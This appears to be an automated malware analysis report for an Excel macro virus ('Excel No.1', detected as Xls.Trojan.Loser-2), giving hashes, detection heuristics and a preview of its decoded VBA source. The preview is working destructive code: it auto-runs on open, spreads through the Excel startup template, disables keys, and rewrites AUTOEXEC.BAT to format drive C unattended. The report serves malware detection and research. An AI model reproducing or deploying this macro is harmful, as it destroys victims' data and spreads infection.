Xls.Trojan.Loser-2 Office (OLE) malware analysis — malicious · 8656bd23e31e0b9f

MALICIOUS

Office (OLE)

125.0 KB Created: 1997-08-17 11:39:24 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 819aacb3a0ee41e9c15a2056fc6aafb1 SHA-1: 3a2ca0c158e44079a979785d2267af2d5a5eef65 SHA-256: 8656bd23e31e0b9f46bbadfc72c794c82823d43020494288aefa4fde00aacf13

260 Risk Score

Malware Insights

Xls.Trojan.Loser-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Loser-2. It contains VBA macros, specifically triggered by Workbook_Open and AutoOpen, which are designed to execute arbitrary code. The document body and script content suggest a self-referential 'Excel macro virus' lure, while the script attempts to manipulate system files like C:\CONFIG.SYS and C:\AUTOEXEC.BAT.

Heuristics 5

ClamAV: Xls.Trojan.Loser-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Loser-2
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	88708 bytes
SHA-256: `5dbf0eb4713beecada57921eb5c22a6f4cc8af8526c25051379f85818632b4a4`
Detection ClamAV: Xls.Trojan.Loser-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) On Error Resume Next If Not OK Then Cancel = True Else Cancel = False Exit Sub End If ThisWorkbook.Worksheets("ExcelNo1").Visible = False ThisWorkbook.Worksheets("ExcelNo1").Save Set S = Nothing End Sub Private Sub Workbook_Open() AutoOpen.Main ThisWorkbook.Worksheets("ExcelNo1").Visible = True ThisWorkbook.Worksheets("ExcelNo1").Activate OK = False End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" Global Const Config$ = "C:\CONFIG.SYS" Global Const Autoexec$ = "C:\AUTOEXEC.BAT" Public S As Object, OK As Boolean Public OfficeDir$, TemplateDir$, StartDir$ Public Sub Main() StatusBar = "正在初始化設定..." Application.ScreenUpdating = False SaveFile GetDirs InterruptKeys StatusBar = "Excel No.1已經佔據您的系統" Application.ScreenUpdating = True End Sub Public Sub GetDirs() ExcelDir$ = Application.Path TemplateDir$ = Application.TemplatesPath StartDir$ = Application.StartupPath End Sub Public Sub KillMenu() On Error Resume Next Application.CommandBars("Worksheet Menu Bar").Controls(9).Delete Application.CommandBars("Worksheet Menu Bar").Controls(8).Delete Application.CommandBars("Worksheet Menu Bar").Controls(6).Delete Application.CommandBars("Worksheet Menu Bar").Controls(5).Delete Application.CommandBars("Worksheet Menu Bar").Controls(4).Delete Application.CommandBars("Worksheet Menu Bar").Controls(3).Delete Application.CommandBars("Worksheet Menu Bar").Controls(2).Delete Application.CommandBars("Worksheet Menu Bar").Controls(1).Delete End Sub Public Sub ReAuto() On Error Resume Next If UCase(Dir(Autoexec$)) = "AUTOEXEC.BAT" Then SetAttr Autoexec$, 0 End If No = FreeFile Open "C:\c" For Output As #No Print #No, "y" & Chr$(13) Print #No, Chr$(13) Close #No No = FreeFile Open Autoexec$ For Output As #No Print #No, "PATH = C:\;" & S.WinPath & "\COMMAND;" & S.SystemPath Print #No, "format C:/u/q/v:EXCELNO1 < c" Close #No End Sub Public Sub SaveFile() f$ = StartDir & "\BOOK.XLT" If UCase(Dir(f$)) = "BOOK.XLT" Then Exit Sub On Error Resume Next Application.ActiveWorkbook.SaveAs FileName:=f$, FileFormat:=xlTemplate Set S = New X For c = 1 To 20 S.CreateLink 1, "Excel No.1 - " & c, f$, "" Next c Set S = Nothing End Sub Public Sub InterruptKeys() On Error Resume Next With Application .OnKey "{BACKSPACE}", "" .OnKey "{BREAK}", "" .OnKey "{DOWN}", "" .OnKey "{UP}", "" .OnKey "{LEFT}", "" .OnKey "{RIGHT}", "" .OnKey "{ESC}", "" .OnKey "{DEL}", "" .OnKey "{HOME}", "" .OnKey "{END}", "" .OnKey "{PGDN}", "" .OnKey "{PGUP}", "" .OnKey "{RETURN}", "" .OnKey "{ENTER}", "" .OnKey "{TAB}", "" .OnKey "%{F4}", "" .OnKey "{F1}", "" .OnKey "{NUMLOCK}", "" End With End Sub Public Sub SafeExit() OK = True ThisWorkbook.Saved = True Application.Quit End Sub Public Sub ReConfig() On Error Resume Next If UCase(Dir(Config$)) = "CONFIG.SYS" Then SetAttr "C:\CONFIG.SYS", 0 End If No = FreeFile Open Config$ For Output As #No Print #No, "Rem **** You're infected by Excel No.1 Macro Virus!" Print #No, "Dos = Low" Print #No, "FCBS ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.